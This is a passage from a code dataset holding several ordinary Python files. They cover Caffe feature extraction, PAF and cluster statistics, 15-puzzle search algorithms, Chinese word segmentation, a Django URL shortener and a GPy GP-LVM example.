data.shape[1], n * data.shape[3]) + data.shape[4:])\n plt.imshow(data)\n plt.axis('off')\n\n\ndef extract_feature(model_def, model_weights, mean_npy, file_list, feature_npy,\n gpu=0, layer=\"fc7\", batch_size=50):\n \"\"\"Extract features using the Caffe utility.\n \n Refer to http://caffe.berkeleyvision.org/ for Caffe.\n \n :param model_def: a net.prototxt file path.\n :param model_weights: a .caffemodel file path.\n :param mean_npy: a mean.npy file path.\n :param file_list: a .txt file path or an image path list.\n :param feature_npy: a feature.npy file path.\n :param gpu: the gpu device number, defaults to 0.\n :param layer: the CaffeNet layer, optional, defaults to \"fc7\".\n :param batch_size: the batch size.\n :return: None\n \"\"\"\n if isinstance(file_list, str):\n image_list = read_file_list(file_list)\n else:\n image_list = file_list\n if not image_list or not isinstance(image_list, list):\n return\n try:\n if not os.path.isfile(model_def):\n raise TypeError\n except TypeError:\n print(model_def, \"is not a file\")\n return\n try:\n if not os.path.isfile(model_weights):\n raise TypeError\n except TypeError:\n print(model_weights, \"is not a file\")\n return\n try:\n if not os.path.isfile(mean_npy):\n raise TypeError\n except TypeError:\n print(mean_npy, \"is not a file\")\n return\n try:\n if not os.path.basename(feature_npy):\n raise TypeError\n elif os.path.dirname(feature_npy) and not os.path.exists(os.path.dirname(feature_npy)):\n os.makedirs(os.path.dirname(feature_npy))\n except TypeError:\n print(feature_npy, \"is not a filename\")\n return\n # caffe.set_mode_cpu()\n caffe.set_device(gpu) # if we have multiple GPUs, pick one\n caffe.set_mode_gpu()\n net = caffe.Net(model_def, # defines the structure of the model\n model_weights, # contains the trained weights\n caffe.TEST) # use test mode (e.g., don't perform dropout)\n try:\n if layer not in net.blobs:\n raise KeyError\n except KeyError:\n print(\"no layer named\", layer)\n return\n # load the mean ImageNet image (as distributed with Caffe) for subtraction\n mu = np.load(mean_npy)\n mu = mu.mean(1).mean(1) # average over pixels to obtain the mean (BGR) pixel values\n print(\"mean-subtracted values:\", zip(\"BGR\", mu))\n # create transformer for the input called \"data\"\n transformer = caffe.io.Transformer({net.inputs[0]: net.blobs[net.inputs[0]].data.shape})\n transformer.set_transpose(net.inputs[0], (2, 0, 1)) # move image channels to outermost dimension\n transformer.set_mean(net.inputs[0], mu) # subtract the dataset-mean value in each channel\n transformer.set_raw_scale(net.inputs[0], 255) # rescale from [0, 1] to [0, 255]\n transformer.set_channel_swap(net.inputs[0], (2, 1, 0)) # swap channels from RGB to BGR\n # set the size of the input (we can skip this if we're happy\n # with the default; we can also change it later, e.g., for different batch sizes)\n net.blobs[net.inputs[0]].reshape(batch_size, # batch size\n net.blobs[net.inputs[0]].data.shape[1], # 3-channel (BGR) images\n net.blobs[net.inputs[0]].data.shape[2],\n net.blobs[net.inputs[0]].data.shape[3]) # default image size is 227x227\n i = 0\n j = 0\n # output_shape = [0]\n output_shape = [len(image_list)]\n output_shape.extend(net.blobs[layer].data.shape[1:])\n output = np.empty(output_shape, dtype=net.blobs[layer].data.dtype)\n for image_path in image_list:\n if j == batch_size:\n # perform classification\n net.forward()\n feat = net.blobs[layer].data\n # output = np.append(output, feat, axis=0)\n # output = np.concatenate((output, feat), axis=0)\n # output = np.stack((output, feat), axis=0)\n # output = np.vstack((output, feat))\n output[i * batch_size:i * batch_size + j] = feat.copy()\n i += 1\n j = 0\n # if i * batch_size % 1000 == 0:\n # print(\"Extracted features of {} query images for feature blob {}\".format(i * batch_size, layer))\n try:\n image = caffe.io.load_image(image_path)\n transformed_image = transformer.preprocess(net.inputs[0], image)\n except Exception as e_caffe:\n print(\"%s:\" % image_path)\n # print(e_caffe)\n # print(str(e_caffe))\n print(repr(e_caffe))\n # print(e_caffe.message)\n # print(traceback.format_exc())\n # print(sys.exc_info())\n # traceback.print_exc()\n try:\n with open(\"log.txt\", \"a\") as e_log:\n e_log.write(\"%s:\\n\" % image_path)\n traceback.print_exc(file=e_log)\n e_log.flush()\n except Exception as e_log_write:\n print(\"fail to write log.txt\")\n print(\"{}: {}\".format(image_path, repr(e_log_write)))\n try:\n with open(\"name.txt\", \"a\") as e_path:\n e_path.write(\"{}, {}\\n\".format(image_path, i * batch_size + j))\n except Exception as e_path_write:\n print(\"fail to write path.txt\")\n print(\"{}, {}: {}\".format(image_path, i * batch_size + j, repr(e_path_write)))\n else:\n # copy the image data into the memory allocated for the net\n net.blobs[net.inputs[0]].data[j, :, :, :] = transformed_image\n finally:\n j += 1\n if j:\n net.forward()\n feat = net.blobs[layer].data[0:j]\n # output = np.vstack((output, feat))\n output[i * batch_size:i * batch_size + j] = feat.copy()\n # print(\"Extracted features of {} query images for feature blob {}\".format(i * batch_size + j, layer))\n np.save(feature_npy, output)\n # print(\"Successfully extracted the features!\")\n\n\ndef split_list(image_list, wanted_parts=1):\n \"\"\"Split image list.\n\n The number of each split may be not equal.\n\n :param image_list: an image path list.\n :param wanted_parts: the total number of splits.\n :return: a list contains all sublists of the image path list.\n \"\"\"\n length = len(image_list)\n return [image_list[i*length // wanted_parts: (i+1)*length // wanted_parts]\n for i in xrange(wanted_parts)]\n\n\ndef multi_gpu(model_def, model_weights, mean_npy, file_list, prefix, parts,\n layer=\"fc7\", batch_size=50):\n \"\"\"Extract features using multi gpu.\n\n Refer to https://docs.python.org/2/library/multiprocessing.html for multiprocessing.\n\n :param model_def: a net.prototxt file path.\n :param model_weights: a .caffemodel file path.\n :param mean_npy: a mean.npy file path.\n :param file_list: a .txt file path or an image path list.\n :param prefix: the feature.npy file prefix.\n :param parts: the total number of used gpu.\n :param layer: the CaffeNet layer, optional, defaults to \"fc7\".\n :param batch_size: the batch size.\n :return: None\n \"\"\"\n if isinstance(file_list, str):\n image_list = read_file_list(file_list)\n else:\n image_list = file_list\n if not file_list:\n return\n blocks = split_list(image_list, parts)\n multiprocessing.freeze_support()\n pool = multiprocessing.Pool()\n for i in xrange(parts):\n feature_npy = prefix + str(i)\n pool.apply_async(extract_feature, args=(model_def, model_weights, mean_npy, blocks[i], feature_npy,\n i, layer, batch_size))\n pool.close()\n pool.join()\n\n\ndef _main(argv=None):\n if argv is None:\n argv = sys.argv[1:]\n parser = argparse.ArgumentParser()\n parser.add_argument(\"net_prototxt\")\n parser.add_argument(\"caffemodel\")\n parser.add_argument(\"mean_npy\")\n parser.add_argument(\"file_list\")\n parser.add_argument(\"output_name\")\n parser.add_argument(\"-m\", \"--mode\", nargs=\"?\", const=\"multi\", default=\"single\", choices=[\"single\", \"multi\"])\n parser.add_argument(\"-g\", \"--gpu\", nargs=\"?\", type=int)\n parser.add_argument(\"-l\", \"--layer\", nargs=\"?\", const=\"fc7\", default=\"fc7\")\n parser.add_argument(\"-b\", \"--batch_size\", nargs=\"?\", const=50, default=50, type=int)\n try:\n args = parser.parse_args(argv)\n except argparse.ArgumentError as msg:\n print(repr(msg), file=sys.stderr)\n return 1\n else:\n if args.mode == \"multi\":\n if args.gpu:\n num = args.gpu\n else:\n num = 1\n multi_gpu(args.net_prototxt, args.caffemodel, args.mean_npy, args.file_list, args.output_name,\n num, args.layer, args.batch_size)\n else:\n if args.gpu:\n num = args.gpu\n else:\n num = 0\n extract_feature(args.net_prototxt, args.caffemodel, args.mean_npy, args.file_list, args.output_name,\n num, args.layer, args.batch_size)\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(_main())\n","sub_path":"caffe/feature_extraction.py","file_name":"feature_extraction.py","file_ext":"py","file_size_in_byte":11978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"537845428","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n\n@author: bchurche\n\"\"\"\n\nimport os\nimport argparse\nimport subprocess\nimport shlex\nimport pandas as pd\nimport re\n\nparser = argparse.ArgumentParser(description='stats_clusters')\n\nparser.add_argument(\"-paf\", \"--PAFDIR\", action=\"store\", type=str, required=True ,dest=\"PAFDIR\",\n help=\"Path to paf files.\")\nparser.add_argument(\"-c\", \"--carnac\", action=\"store\", type=str, required=True, dest=\"CARNACDIR\",\n help=\"Path to CARNAC files & clusters fasta files\")\nparser.add_argument(\"-tmp\", \"--tmp_output\", action=\"store\", type=str, required=True, dest=\"tmp_output\",\n help=\"Path to tmp output file\")\nparser.add_argument(\"-o\", \"--output\", action=\"store\", type=str, required=True, dest=\"output\",\n help=\"Path to output file\")\n\noptions = parser.parse_args()\n\nPAFDIR = os.path.abspath(options.PAFDIR)\nCARNACDIR = os.path.abspath(options.CARNACDIR)\ntmp_output = os.path.abspath(options.tmp_output)\noutput = os.path.abspath(options.output)\n\nlist_files = [file for file in os.listdir(PAFDIR) if (os.path.isfile(os.path.join(PAFDIR, file))\n and os.path.splitext(file)[1]==\".paf\")]\n\nlist_dir = [dir for dir in os.listdir(CARNACDIR) if (os.path.isdir(os.path.join(CARNACDIR, dir)) and \"clusters\" in dir)]\n\nassert list_files != []\nassert list_dir != []\n\nprint(\"This is list of directories : \")\nprint(os.listdir(CARNACDIR))\nprint(list_dir)\n\nos.chdir(PAFDIR)\n\ndico = {\"Names\":[], \"Kmer\":[], \"Window\":[], \"Minimizer\":[], \"Stop chaining\":[], \"Chain skip\":[], \"Nodes\":[],\n \"Edges\":[], \"Clusters\":[], \"Names_clusters\":[]}\n\nfor file in list_files:\n\n filename = os.path.basename(file)\n\n # command = \"cat {0}\".format(os.path.join(PAFDIR,file))\n # args = shlex.split(command)\n # ps = subprocess.Popen(args, stdout=subprocess.PIPE)\n # ps.wait()\n # print(command)\n\n command = \"cut -f '1' {} > {}\".format(file, tmp_output)\n #args = shlex.split(command)\n subprocess.check_call(command, shell=True)\n print(command)\n\n command = \"cut -f '6' {} > {}\".format(file, tmp_output)\n #args = shlex.split(command)\n subprocess.check_call(command, shell=True)\n print(command)\n\n command = \"sort -u {0} | wc -l\".format(tmp_output)\n #args = shlex.split(command)\n number_nodes = int(subprocess.check_output(command, shell = True))\n #number_nodes = subprocess.check_output(shlex.split(\"wc -l\"))\n number_edges = int(subprocess.check_output(shlex.split(\"wc -l {0}\".format(file))).decode().split(' ')[0])\n print(\"This is number of nodes : {0}\".format(number_nodes))\n print(\"This is number of edges : {0}\".format(number_edges))\n\n try:\n kmer = re.search('k(.+?)w', file).group(1)\n except AttributeError:\n kmer = ''\n try:\n window = re.search('w(.+?)m', file).group(1)\n except AttributeError:\n window = ''\n try:\n minimizer = re.search('m(.+?)g', file).group(1)\n except AttributeError:\n minimizer = ''\n try:\n stop_chain = re.search('g(.+?)skip', file).group(1)\n except AttributeError:\n stop_chain = ''\n try:\n chain_skip = re.search('skip(.+?).paf', file).group(1)\n except AttributeError:\n chain_skip = ''\n\n dico[\"Names\"].append(filename)\n dico[\"Nodes\"].append(number_nodes)\n dico[\"Edges\"].append(number_edges)\n dico[\"Kmer\"].append(kmer)\n dico[\"Window\"].append(window)\n dico[\"Minimizer\"].append(minimizer)\n dico[\"Stop chaining\"].append(stop_chain)\n dico[\"Chain skip\"].append(chain_skip)\n\n os.remove(tmp_output)\n\nos.chdir(CARNACDIR)\n\nfor dir in list_dir:\n\n ps = subprocess.Popen((\"ls\",dir), stdout=subprocess.PIPE)\n ps.wait()\n number_clusters = int(subprocess.check_output((\"wc\",\"-l\"), stdin=ps.stdout))\n dico[\"Names_clusters\"].append(dir)\n dico[\"Clusters\"].append(number_clusters)\n\nprint(dico)\n\ndf = pd.DataFrame.from_dict(dico)\ndf = df[[\"Names\", \"Kmer\", \"Window\", \"Minimizer\", \"Stop chaining\", \"Chain skip\", \"Nodes\", \"Edges\", \"Clusters\",\n \"Names_clusters\"]]\n\nwith open(output, \"w\") as f:\n df.to_csv(f, sep='\\t', encoding='utf-8')\n\nprint(df)\n","sub_path":"scripts/stats_clusters.py","file_name":"stats_clusters.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"345753572","text":"import time\r\nimport numpy as np\r\nimport sys\r\nimport copy\r\nsys.path.insert(0, \"aipython\")\r\nfrom aipython.searchGeneric import *\r\nfrom aipython.searchProblem import *\r\nfrom aipython.cspProblem import *\r\nfrom aipython.cspSearch import *\r\nfrom T1 import *\r\n\r\nclass BreadthFirstSearcher(Searcher):\r\n\r\n def __init__(self, problem):\r\n super().__init__(problem)\r\n\r\n \"\"\" Initializes the forontier \"\"\"\r\n\r\n def initialize_frontier(self):\r\n self.frontier_ = []\r\n\r\n \"\"\" Returns True if there are no more nodes to expand \"\"\"\r\n\r\n def empty_frontier(self):\r\n return len(self.frontier_) == 0\r\n\r\n \"\"\" Adds the path to the forontier \"\"\"\r\n\r\n def add_to_frontier(self, path):\r\n self.frontier_.append(path)\r\n\r\n \"\"\"returns (next) path from the problem's start node\r\n to a goal node. \"\"\"\r\n\r\n def search(self):\r\n \"\"\"returns (next) path from the problem's start node\r\n to a goal node.\r\n Returns None if no path exists.\r\n \"\"\"\r\n visited = set()\r\n start_t = time.time()\r\n\r\n while not self.empty_frontier():\r\n if len(self.frontier_) >= 1000000:\r\n print(\"Mem\")\r\n return None\r\n\r\n if time.time() - start_t > 300:\r\n print(\"Time\")\r\n return None\r\n\r\n path = self.frontier_.pop(0)\r\n\r\n self.num_expanded += 1\r\n\r\n sign = tuple(tuple(i) for i in path.end())\r\n if sign in visited:\r\n continue\r\n visited.add(sign)\r\n\r\n if self.problem.is_goal(path.end()): # solution found\r\n print(\"Expanded {}, Remained: {}\".format(self.num_expanded, len(self.frontier_)))\r\n self.solution = path # store the solution found\r\n return path\r\n else:\r\n neighs = self.problem.neighbors(path.end())\r\n for arc in reversed(list(neighs)):\r\n np = Path(path, arc)\r\n sign = tuple(tuple(i) for i in np.end())\r\n if sign not in visited:\r\n self.add_to_frontier(np)\r\n\r\n print(\"No more solution, explored\".format(self.num_expaned))\r\n return None\r\n\r\n\r\ndef test_s(searcher, title):\r\n print(\"-\" * 60 + \"\\n\" + title)\r\n\r\n solution = searcher.search()\r\n if solution is not None:\r\n print(\"Cost: {}\".format(solution.cost))\r\n\r\n\r\nGFP = GameFifteenProblem\r\nstart1 = [[1, 2, 3, 4],\r\n [5, 6, 7, 8],\r\n [9, 10, 11, 12],\r\n [13, 14, 0, 15]]\r\n\r\n# optimal path cost: 10\r\nstart10 = [[2, 3, 7, 4],\r\n [1, 6, 11, 8],\r\n [5, 10, 0, 12],\r\n [9, 13, 14, 15]]\r\n\r\ntest_s(BreadthFirstSearcher(GFP(start1, goal)), \"start1 BFS\")\r\ntest_s(BreadthFirstSearcher(GFP(start10, goal)), \"start10 BFS\")\r\n\r\n\r\nclass IterativeDeepeningSearcher(Searcher):\r\n def __init__(self, problem):\r\n super().__init__(problem)\r\n\r\n self.visited_ = None\r\n self.start_t_ = None\r\n self.path_ = None\r\n\r\n \"\"\" Initializes the forontier \"\"\"\r\n\r\n def initialize_frontier(self):\r\n self.frontier_ = []\r\n\r\n \"\"\" Returns True if there are no more nodes to expand \"\"\"\r\n\r\n def empty_frontier(self):\r\n return len(self.frontier_) == 0\r\n\r\n \"\"\" Adds the path to the forontier \"\"\"\r\n\r\n def add_to_frontier(self, path):\r\n self.frontier_.append(path)\r\n\r\n def search(self):\r\n self.start_t_ = time.time()\r\n self.path_ = self.frontier_.pop(0)\r\n\r\n for limit in range(1, 1000000):\r\n self.visited_ = set()\r\n\r\n ret = self.dfs_(0, limit)\r\n\r\n if ret is not None:\r\n print(\"Expanded {}, Remained: {}\".format(self.num_expanded, len(self.frontier_)))\r\n self.solution = ret\r\n return ret\r\n\r\n if time.time() - self.start_t_ > 300:\r\n print(\"Time\")\r\n return None\r\n\r\n # exceed 1000000 memory limit\r\n print(\"Mem\")\r\n return None\r\n\r\n def dfs_(self, depth, limit):\r\n if self.problem.is_goal(self.path_.end()):\r\n print(\"Found solution\")\r\n return self.path_\r\n\r\n if depth >= limit:\r\n return None\r\n\r\n sign = (tuple(tuple(i) for i in self.path_.end()), depth)\r\n if sign in self.visited_:\r\n return None\r\n self.visited_.add(sign)\r\n\r\n self.num_expanded += 1\r\n\r\n neighs = self.problem.neighbors(self.path_.end())\r\n for arc in list(neighs):\r\n tmp = self.path_\r\n\r\n # add new node\r\n self.path_ = Path(self.path_, arc)\r\n ret = self.dfs_(depth + 1, limit)\r\n\r\n # find solution\r\n if ret is not None:\r\n return ret\r\n\r\n if time.time() - self.start_t_ > 300:\r\n return None\r\n\r\n # backtracking to previous path\r\n self.path_ = tmp\r\n\r\n return None\r\n\r\n\r\ndef test_s(searcher, title):\r\n print(\"-\" * 60 + \"\\n\" + title)\r\n\r\n solution = searcher.search()\r\n if solution is not None:\r\n print(\"Cost: {}\".format(solution.cost))\r\n print(solution)\r\n\r\n\r\nGFP = GameFifteenProblem\r\nstart1 = [[1, 2, 3, 4],\r\n [5, 6, 7, 8],\r\n [9, 10, 11, 12],\r\n [13, 14, 0, 15]]\r\n\r\n# optimal path cost: 10\r\nstart10 = [[2, 3, 7, 4],\r\n [1, 6, 11, 8],\r\n [5, 10, 0, 12],\r\n [9, 13, 14, 15]]\r\n\r\n# optimal path cost: 24\r\nstart24 = [[2, 7, 11, 4],\r\n [6, 3, 12, 0],\r\n [1, 5, 15, 8],\r\n [9, 10, 13, 14]]\r\n\r\ntest_s(IterativeDeepeningSearcher(GFP(start1, goal)), \"start1 IDS\")\r\ntest_s(IterativeDeepeningSearcher(GFP(start10, goal)), \"start10 IDS\")\r\ntest_s(IterativeDeepeningSearcher(GFP(start24, goal)), \"start24 IDS\")\r\n\r\n\r\nclass IterativeDeepeningAStarSearcher(Searcher):\r\n def __init__(self, problem):\r\n super().__init__(problem)\r\n\r\n self.visited_ = None\r\n self.start_t_ = None\r\n self.path_ = None\r\n self.node_generate_ = None\r\n\r\n \"\"\" Initializes the forontier \"\"\"\r\n\r\n def initialize_frontier(self):\r\n self.frontier_ = []\r\n\r\n \"\"\" Returns True if there are no more nodes to expand \"\"\"\r\n\r\n def empty_frontier(self):\r\n return len(self.frontier_) == 0\r\n\r\n \"\"\" Adds the path to the forontier \"\"\"\r\n\r\n def add_to_frontier(self, path):\r\n self.frontier_.append(path)\r\n\r\n def search(self):\r\n self.start_t_ = time.time()\r\n self.path_ = self.frontier_.pop(0)\r\n self.node_generate_ = 0\r\n\r\n for limit in range(1, 100, 2):\r\n self.visited_ = set()\r\n ret = self.dfs_(limit)\r\n\r\n if ret is not None:\r\n print(\"Expanded {}, Generated: {}\".format(self.num_expanded, self.node_generate_))\r\n self.solution = ret\r\n return ret\r\n\r\n if time.time() - self.start_t_ > 300:\r\n print(\"Expanded: {}, Status: {}\".format(self.num_expanded, \"Time\"))\r\n return None\r\n\r\n # exceed 1000000 memory limit\r\n print(\"Mem\")\r\n return None\r\n\r\n def dfs_(self, limit):\r\n if self.problem.is_goal(self.path_.end()):\r\n print(\"Found solution\")\r\n return self.path_\r\n\r\n self.num_expanded += 1\r\n\r\n neighs = self.problem.neighbors(self.path_.end())\r\n q = FrontierPQ()\r\n for arc in list(neighs):\r\n path = Path(self.path_, arc)\r\n value = path.cost + self.problem.heuristic(path.end())\r\n\r\n if value <= limit:\r\n q.add(path, value)\r\n self.node_generate_ += 1\r\n\r\n while not q.empty():\r\n tmp = self.path_\r\n self.path_ = q.pop()\r\n\r\n ret = self.dfs_(limit)\r\n\r\n # find solution\r\n if ret is not None:\r\n return ret\r\n\r\n if time.time() - self.start_t_ > 300:\r\n return None\r\n\r\n # backtracking to previous path\r\n self.path_ = tmp\r\n\r\n return None\r\n\r\n\r\ndef test_s(searcher, title):\r\n print(\"-\" * 60 + \"\\n\" + title)\r\n\r\n solution = searcher.search()\r\n if solution is not None:\r\n print(\"Cost: {}\".format(solution.cost))\r\n print(solution)\r\n\r\n\r\nGFP = GameFifteenProblem\r\nstart1 = [[1, 2, 3, 4],\r\n [5, 6, 7, 8],\r\n [9, 10, 11, 12],\r\n [13, 14, 0, 15]]\r\n\r\n# optimal path cost: 10\r\nstart10 = [[2, 3, 7, 4],\r\n [1, 6, 11, 8],\r\n [5, 10, 0, 12],\r\n [9, 13, 14, 15]]\r\n\r\n# optimal path cost: 24\r\nstart24 = [[2, 7, 11, 4],\r\n [6, 3, 12, 0],\r\n [1, 5, 15, 8],\r\n [9, 10, 13, 14]]\r\n\r\nprint(test_s(IterativeDeepeningAStarSearcher(GFP(start1, goal)), \"start1 IDSA*\"))\r\ntest_s(IterativeDeepeningAStarSearcher(GFP(start10, goal)), \"start10 IDSA*\")\r\ntest_s(IterativeDeepeningAStarSearcher(GFP(start24, goal)), \"start24 IDSA*\")\r\n\r\nclass UniformCostSearcher(Searcher):\r\n \"\"\" Initializes the forontier \"\"\"\r\n def initialize_frontier(self):\r\n self.frontier = FrontierPQ()\r\n\r\n \"\"\" Returns True if there are no more nodes to expand \"\"\"\r\n def empty_frontier(self):\r\n return self.frontier.empty()\r\n\r\n \"\"\" Adds the path to the forontier \"\"\"\r\n def add_to_frontier(self, path):\r\n self.frontier.add(path, path.cost)\r\n if len(self.frontier) > 1000000:\r\n print(\"Mem\")\r\n raise\r\n\r\n\r\n# optimal path cost: 10\r\nstart10 = [[2, 3, 7, 4],\r\n [1, 6, 11, 8],\r\n [5, 10, 0, 12],\r\n [9, 13, 14, 15]]\r\n\r\n# optimal path cost: 24\r\nstart24 = [[2, 7, 11, 4],\r\n [6, 3, 12, 0],\r\n [1, 5, 15, 8],\r\n [9, 10, 13, 14]]\r\n\r\n# optimal path cost: 30\r\nstart30 = [[2, 7, 11, 4],\r\n [6, 3, 12, 0],\r\n [1, 5, 15, 14],\r\n [9, 10, 8, 13]]\r\n\r\n# optimal path cost: 36\r\nstart36 = [[7, 11, 12, 4],\r\n [2, 3, 14, 1],\r\n [6, 5, 13, 8],\r\n [9, 10, 15, 0]]\r\n\r\n# optimal path cost: 41\r\nstart41 = [[7, 11, 12, 4],\r\n [2, 3, 8, 14],\r\n [10, 0, 5, 1],\r\n [6, 9, 13, 15]]\r\n\r\n\r\ndef test_s(searcher, title):\r\n print(\"-\" * 60 + \"\\n\" + title)\r\n solution = searcher.search()\r\n if solution is not None:\r\n print(\"[{}] cost: {}\".format(title, solution.cost))\r\n\r\n\r\nGFP = GameFifteenProblem\r\n\r\n# your code\r\ntry:\r\n test_s(BreadthFirstSearcher(GFP(start10, goal)), \"start10 BFS\")\r\n test_s(BreadthFirstSearcher(GFP(start24, goal)), \"start24 BFS\")\r\n test_s(BreadthFirstSearcher(GFP(start30, goal)), \"start30 BFS\")\r\n test_s(BreadthFirstSearcher(GFP(start36, goal)), \"start36 BFS\")\r\n test_s(BreadthFirstSearcher(GFP(start41, goal)), \"start41 BFS\")\r\nexcept:\r\n print(\"Continue to next algorithm\")\r\n\r\ntry:\r\n test_s(IterativeDeepeningSearcher(GFP(start10, goal)), \"start10 IDS\")\r\n test_s(IterativeDeepeningSearcher(GFP(start24, goal)), \"start24 IDS\")\r\n test_s(IterativeDeepeningSearcher(GFP(start30, goal)), \"start30 IDS\")\r\n test_s(IterativeDeepeningSearcher(GFP(start36, goal)), \"start36 IDS\")\r\n test_s(IterativeDeepeningSearcher(GFP(start41, goal)), \"start41 IDS\")\r\nexcept:\r\n print(\"Continue to next algorithm\")\r\n\r\ntry:\r\n test_s(IterativeDeepeningAStarSearcher(GFP(start10, goal)), \"start10 IDA*\")\r\n test_s(IterativeDeepeningAStarSearcher(GFP(start24, goal)), \"start24 IDA*\")\r\n test_s(IterativeDeepeningAStarSearcher(GFP(start30, goal)), \"start30 IDA*\")\r\n test_s(IterativeDeepeningAStarSearcher(GFP(start36, goal)), \"start36 IDA*\")\r\n test_s(IterativeDeepeningAStarSearcher(GFP(start41, goal)), \"start41 IDA*\")\r\nexcept:\r\n print(\"Continue to next algorithm\")\r\n\r\ntry:\r\n test_s(UniformCostSearcher(GFP(start10, goal)), \"start10 UCS\")\r\n test_s(UniformCostSearcher(GFP(start24, goal)), \"start24 UCS\")\r\n test_s(UniformCostSearcher(GFP(start30, goal)), \"start30 UCS\")\r\n test_s(UniformCostSearcher(GFP(start36, goal)), \"start36 UCS\")\r\n test_s(UniformCostSearcher(GFP(start41, goal)), \"start41 UCS\")\r\nexcept:\r\n print(\"Continue to next algorithm\")\r\n\r\ntry:\r\n test_s(AStarSearcher(GFP(start10, goal)), \"start10 A*\")\r\n test_s(AStarSearcher(GFP(start24, goal)), \"start24 A*\")\r\n test_s(AStarSearcher(GFP(start30, goal)), \"start30 A*\")\r\n test_s(AStarSearcher(GFP(start36, goal)), \"start36 A*\")\r\n test_s(AStarSearcher(GFP(start41, goal)), \"start41 A*\")\r\nexcept:\r\n print(\"Done\")\r\n\r\nprint('Task2 Done')","sub_path":"9814Ass1/T2.py","file_name":"T2.py","file_ext":"py","file_size_in_byte":12376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"514086946","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\"\"\"\n@Time : 2019-01-07 08:57\n@Author : red\n@Site : \n@File : seg_word.py\n@Software: PyCharm\n\"\"\"\nimport jieba_fast as jieba\nimport configparser as cf\nimport codecs\nfrom utils import file_util\nimport re\n\n# 开启并行分词模式,参数为并行进程数\njieba.enable_parallel(4)\n\n\ndef get_file_path(section, key):\n conf = cf.ConfigParser()\n conf.read('../conf/config.cfg')\n return conf.get(section, key)\n\n\ndef get_stop_word():\n with codecs.open(get_file_path('stop_file', 'stop_words_chinese_1'), 'r', encoding='utf8') as f1:\n data1 = f1.read()\n\n with codecs.open(get_file_path('stop_file', 'stop_words_english_1'), 'r') as f2:\n data2 = f2.read()\n f_stop_list = (data1 + data2).split('\\n')\n return f_stop_list\n\n\ndef write_file(file_path, content):\n with codecs.open(file_path, 'w', encoding='utf8') as w:\n w.write(u\" \".join(content))\n\n\ndef split(stop_lists, data):\n word_list = []\n seg_list = jieba.cut(data, cut_all=False)\n list_str = \" \".join(seg_list)\n\n for word in list_str.split(\" \"):\n if not (word.strip().lower() in stop_lists) \\\n and len(word.strip()) > 1 \\\n and not word.isdigit() \\\n and not re.search('[a-zA-Z]', word) \\\n and '\\u4e00' <= word <= '\\u9fff':\n word_list.append(word)\n for element in word_list:\n file_util.append_file(\"/Users/red/Desktop/temp/news/data/sj_data/all_data/all_seg_word_data.txt\", element + \" \")\n\n\ndef get_content():\n return file_util.read_file(\"/Users/red/Desktop/temp/news/data/sj_data/all_data/article_txt.txt\")\n\n\nif __name__ == '__main__':\n stop_word_list = get_stop_word()\n split(stop_word_list, str(get_content()))\n","sub_path":"seg_word/seg_all_data.py","file_name":"seg_all_data.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"84785543","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse,HttpResponsePermanentRedirect\nfrom .forms import UrlForm\nfrom .models import url\n\nimport string\nimport random\n\ndef short_random_string(n):\n\n return ''.join(random.SystemRandom().choice(\n string.ascii_uppercase + \\\n string.ascii_lowercase + \\\n string.digits) for _ in range(n))\n\ndef index(request):\n if request.method == 'POST':\n \n form = UrlForm(request.POST)\n \n if form.is_valid():\n val={'url': form.cleaned_data['url']}\n hash_ = form.cleaned_data['hash_']\n if hash_:\n if url.objects.filter(custom=hash_).exists():\n return render(request, 'index.html',{'error':\"Provided hash value is already taken\",'form':form})\n else:\n val.update({'custom':hash_})\n else:\n hash_=short_random_string(5)\n val.update({'custom':hash_})\n url.objects.create(**val)\n return render(request,'result.html',{'link': hash_})\n \n\n \n else:\n form = UrlForm()\n return render(request, 'index.html',{'form': form})\n\ndef result(request):\n return render(request,'result.html')\n\ndef go(request,link):\n hash_=link\n go=get_object_or_404(url, custom=hash_)\n return HttpResponsePermanentRedirect(go.url)\n\n","sub_path":"shortener/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"106047279","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 29 15:26:15 2019\n\n@author: vidhi\n\"\"\"\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport GPy\nnp.random.seed(12345)\n\n# Define dataset \nN = 100\nk1 = GPy.kern.RBF(5, variance=1, lengthscale=1./np.random.dirichlet(np.r_[10,10,10,0.1,0.1]), ARD=True)\nk2 = GPy.kern.RBF(5, variance=1, lengthscale=1./np.random.dirichlet(np.r_[10,0.1,10,0.1,10]), ARD=True)\nk3 = GPy.kern.RBF(5, variance=1, lengthscale=1./np.random.dirichlet(np.r_[0.1,0.1,10,10,10]), ARD=True)\nX = np.random.normal(0, 1, (N, 5))\nA = np.random.multivariate_normal(np.zeros(N), k1.K(X), 10).T\nB = np.random.multivariate_normal(np.zeros(N), k2.K(X), 10).T\nC = np.random.multivariate_normal(np.zeros(N), k3.K(X), 10).T\n\nY = np.vstack((A,B,C))\nlabels = np.hstack((np.zeros(A.shape[0]), np.ones(B.shape[0]), np.ones(C.shape[0])*2))\n\ninput_dim = 2 # How many latent dimensions to use\nkernel = GPy.kern.RBF(input_dim, 1, ARD=True) \n\nQ = input_dim\nm_gplvm = GPy.models.GPLVM(Y, Q, kernel=GPy.kern.RBF(Q))\nm_gplvm.kern.lengthscale = .2\nm_gplvm.kern.variance = 1\nm_gplvm.likelihood.variance = 1.\nm_gplvm\n\nm_gplvm.plot_latent(labels=labels)\n\n","sub_path":"GP/Advanced Gaussian Processes/gp_lvm.py","file_name":"gp_lvm.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"351701432","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 